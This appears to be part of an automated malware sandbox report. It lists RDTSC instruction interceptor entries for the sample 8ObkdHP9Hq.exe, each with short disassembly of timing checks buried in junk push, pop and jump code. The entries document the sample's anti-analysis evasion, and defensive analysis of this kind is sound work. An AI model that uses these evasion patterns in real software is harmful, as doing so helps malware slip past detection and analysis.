                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51600A5 second address: 51600C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51600C1 second address: 51600C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51600C5 second address: 51600C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51600C9 second address: 51600CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51600CF second address: 51600D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51600D5 second address: 51600D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51806FD second address: 5180703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5180703 second address: 518071C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, bl 0x0000000f mov cx, B105h 0x00000013 popad 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 518071C second address: 5180772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD0B5483378h 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FD0B5483370h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FD0B548336Dh 0x00000021 jmp 00007FD0B548336Bh 0x00000026 popfd 0x00000027 mov ebx, ecx 0x00000029 popad 0x0000002a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5180772 second address: 51807E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD0B534805Bh 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jmp 00007FD0B5348062h 0x00000014 mov dword ptr [esp], ecx 0x00000017 pushad 0x00000018 mov eax, ebx 0x0000001a popad 0x0000001b mov eax, dword ptr [76FB65FCh] 0x00000020 jmp 00007FD0B534805Fh 0x00000025 test eax, eax 0x00000027 pushad 0x00000028 mov dx, cx 0x0000002b mov eax, 01CC85D7h 0x00000030 popad 0x00000031 je 00007FD1270FB1FCh 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FD0B5348069h 0x0000003e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51807E1 second address: 51807E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51807E7 second address: 51807EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51807EB second address: 518080C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a jmp 00007FD0B548336Fh 0x0000000f xor eax, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ecx, edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 518080C second address: 5180881 instructions: 0x00000000 rdtsc 0x00000002 call 00007FD0B5348067h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edx, 4DAEE34Ch 0x0000000f popad 0x00000010 and ecx, 1Fh 0x00000013 jmp 00007FD0B534805Bh 0x00000018 ror eax, cl 0x0000001a jmp 00007FD0B5348066h 0x0000001f leave 0x00000020 jmp 00007FD0B5348060h 0x00000025 retn 0004h 0x00000028 nop 0x00000029 mov esi, eax 0x0000002b lea eax, dword ptr [ebp-08h] 0x0000002e xor esi, dword ptr [008E2014h] 0x00000034 push eax 0x00000035 push eax 0x00000036 push eax 0x00000037 lea eax, dword ptr [ebp-10h] 0x0000003a push eax 0x0000003b call 00007FD0B9C287FEh 0x00000040 push FFFFFFFEh 0x00000042 jmp 00007FD0B5348060h 0x00000047 pop eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b movzx esi, di 0x0000004e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5180881 second address: 51808BA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD0B5483379h 0x00000008 adc eax, 0A0BE996h 0x0000000e jmp 00007FD0B5483371h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51808BA second address: 5180911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, eax 0x00000006 popad 0x00000007 popad 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FD0B9C28852h 0x00000010 mov edi, edi 0x00000012 pushad 0x00000013 mov esi, 29DAEC1Bh 0x00000018 call 00007FD0B5348060h 0x0000001d pushfd 0x0000001e jmp 00007FD0B5348062h 0x00000023 add eax, 709FAC18h 0x00000029 jmp 00007FD0B534805Bh 0x0000002e popfd 0x0000002f pop ecx 0x00000030 popad 0x00000031 push ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov ebx, 2174D3F4h 0x0000003a mov edx, 54053B60h 0x0000003f popad 0x00000040 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5180911 second address: 518096B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD0B5483374h 0x00000008 pop esi 0x00000009 jmp 00007FD0B548336Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007FD0B5483376h 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD0B5483377h 0x00000022 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 513001F second address: 5130025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5130025 second address: 513002B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 513002B second address: 513002F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 513002F second address: 5130033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5130033 second address: 5130059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD0B534805Fh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movzx eax, dx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5130059 second address: 513005D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 513005D second address: 5130063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5130063 second address: 5130068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5130068 second address: 51300E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF8h 0x0000000d pushad 0x0000000e mov esi, 4EA568E1h 0x00000013 pushfd 0x00000014 jmp 00007FD0B534805Eh 0x00000019 or ch, 00000078h 0x0000001c jmp 00007FD0B534805Bh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ecx 0x00000024 pushad 0x00000025 mov ecx, 2720C4CBh 0x0000002a movzx eax, di 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007FD0B534805Ah 0x00000034 xchg eax, ecx 0x00000035 pushad 0x00000036 jmp 00007FD0B534805Eh 0x0000003b mov bl, al 0x0000003d popad 0x0000003e push esi 0x0000003f jmp 00007FD0B534805Ah 0x00000044 mov dword ptr [esp], ebx 0x00000047 pushad 0x00000048 jmp 00007FD0B534805Eh 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51300E3 second address: 513014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov ebx, dword ptr [ebp+10h] 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007FD0B5483376h 0x00000010 pop eax 0x00000011 mov edx, 4BC56B86h 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007FD0B5483377h 0x0000001d xor al, 0000000Eh 0x00000020 jmp 00007FD0B5483379h 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov ax, dx 0x0000002e movsx edx, si 0x00000031 popad 0x00000032 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 513014C second address: 51301B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD0B5348067h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FD0B5348069h 0x0000000f xor ch, 00000056h 0x00000012 jmp 00007FD0B5348061h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov si, bx 0x00000020 mov ebx, 3D939ADEh 0x00000025 popad 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD0B5348060h 0x0000002e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51301B7 second address: 513029E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0B5483371h 0x00000009 jmp 00007FD0B548336Bh 0x0000000e popfd 0x0000000f mov di, cx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FD0B5483370h 0x0000001f or ah, 00000038h 0x00000022 jmp 00007FD0B548336Bh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007FD0B5483378h 0x0000002e sbb si, 8F98h 0x00000033 jmp 00007FD0B548336Bh 0x00000038 popfd 0x00000039 popad 0x0000003a xchg eax, edi 0x0000003b jmp 00007FD0B5483376h 0x00000040 push eax 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007FD0B5483371h 0x00000048 or cx, AFE6h 0x0000004d jmp 00007FD0B5483371h 0x00000052 popfd 0x00000053 mov ax, AA17h 0x00000057 popad 0x00000058 xchg eax, edi 0x00000059 pushad 0x0000005a mov ebx, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushfd 0x0000005f jmp 00007FD0B5483372h 0x00000064 sbb cx, 1EB8h 0x00000069 jmp 00007FD0B548336Bh 0x0000006e popfd 0x0000006f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 513029E second address: 51302D6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD0B5348068h 0x00000008 sub esi, 5DC85918h 0x0000000e jmp 00007FD0B534805Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 test esi, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ecx, edi 0x0000001e popad 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51302D6 second address: 51303AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0B5483379h 0x00000009 adc si, 7566h 0x0000000e jmp 00007FD0B5483371h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 je 00007FD12728166Ch 0x0000001f jmp 00007FD0B548336Ch 0x00000024 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002b jmp 00007FD0B5483370h 0x00000030 je 00007FD127281659h 0x00000036 jmp 00007FD0B5483370h 0x0000003b mov edx, dword ptr [esi+44h] 0x0000003e jmp 00007FD0B5483370h 0x00000043 or edx, dword ptr [ebp+0Ch] 0x00000046 pushad 0x00000047 push edi 0x00000048 mov edi, esi 0x0000004a pop eax 0x0000004b popad 0x0000004c test edx, 61000000h 0x00000052 pushad 0x00000053 mov ebx, 0F76D274h 0x00000058 push edx 0x00000059 pushfd 0x0000005a jmp 00007FD0B5483378h 0x0000005f or ax, 6428h 0x00000064 jmp 00007FD0B548336Bh 0x00000069 popfd 0x0000006a pop esi 0x0000006b popad 0x0000006c jne 00007FD12728164Bh 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51303AF second address: 51303B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51303B3 second address: 51303B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51303B9 second address: 51303BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51303BF second address: 51303C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51303C3 second address: 51303E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348065h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51303E8 second address: 51303EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51303EC second address: 51303F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51303F2 second address: 5130413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 03h 0x00000005 jmp 00007FD0B548336Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007FD127281600h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5130413 second address: 5130417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5130417 second address: 513041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 513041B second address: 5130421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120816 second address: 512081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 512081B second address: 512084C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e jmp 00007FD0B5348069h 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov esi, 4966C665h 0x0000001c popad 0x0000001d rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 512084C second address: 512085E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B548336Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 512085E second address: 5120887 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov ah, bh 0x00000010 pop ecx 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 movsx edi, cx 0x00000017 mov dx, si 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120887 second address: 512088C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 512088C second address: 51208D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushfd 0x0000000d jmp 00007FD0B534805Ch 0x00000012 jmp 00007FD0B5348065h 0x00000017 popfd 0x00000018 pop eax 0x00000019 pushad 0x0000001a mov ah, bh 0x0000001c push ecx 0x0000001d pop edx 0x0000001e popad 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51208D5 second address: 51208D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51208D9 second address: 51208DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51208DD second address: 51208E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51208E3 second address: 51208E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51208E9 second address: 51208ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51208ED second address: 5120914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007FD0B534805Ch 0x00000010 sub ebx, ebx 0x00000012 pushad 0x00000013 mov ecx, edi 0x00000015 mov eax, edi 0x00000017 popad 0x00000018 test esi, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120914 second address: 5120918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120918 second address: 5120926 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120926 second address: 5120941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD127288DBFh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120941 second address: 5120945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120945 second address: 512094B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 512094B second address: 51209A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007FD0B5348060h 0x00000015 mov ecx, esi 0x00000017 jmp 00007FD0B5348060h 0x0000001c je 00007FD12714DA77h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD0B5348067h 0x00000029 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51209A1 second address: 5120A2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 movsx edx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test byte ptr [76FB6968h], 00000002h 0x00000013 jmp 00007FD0B548336Ah 0x00000018 jne 00007FD127288D5Eh 0x0000001e pushad 0x0000001f push ecx 0x00000020 jmp 00007FD0B548336Dh 0x00000025 pop eax 0x00000026 mov esi, edx 0x00000028 popad 0x00000029 mov edx, dword ptr [ebp+0Ch] 0x0000002c pushad 0x0000002d movsx edi, cx 0x00000030 call 00007FD0B5483372h 0x00000035 pushad 0x00000036 popad 0x00000037 pop esi 0x00000038 popad 0x00000039 push esp 0x0000003a pushad 0x0000003b mov bx, cx 0x0000003e jmp 00007FD0B5483376h 0x00000043 popad 0x00000044 mov dword ptr [esp], ebx 0x00000047 jmp 00007FD0B5483370h 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120A2A second address: 5120A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120A2E second address: 5120A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120A32 second address: 5120A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120A38 second address: 5120A3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120A3E second address: 5120A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov dl, al 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120A4F second address: 5120A54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120A54 second address: 5120A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120A5A second address: 5120A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 mov esi, 3532662Bh 0x0000000e movzx esi, bx 0x00000011 popad 0x00000012 push dword ptr [ebp+14h] 0x00000015 jmp 00007FD0B5483373h 0x0000001a push dword ptr [ebp+10h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
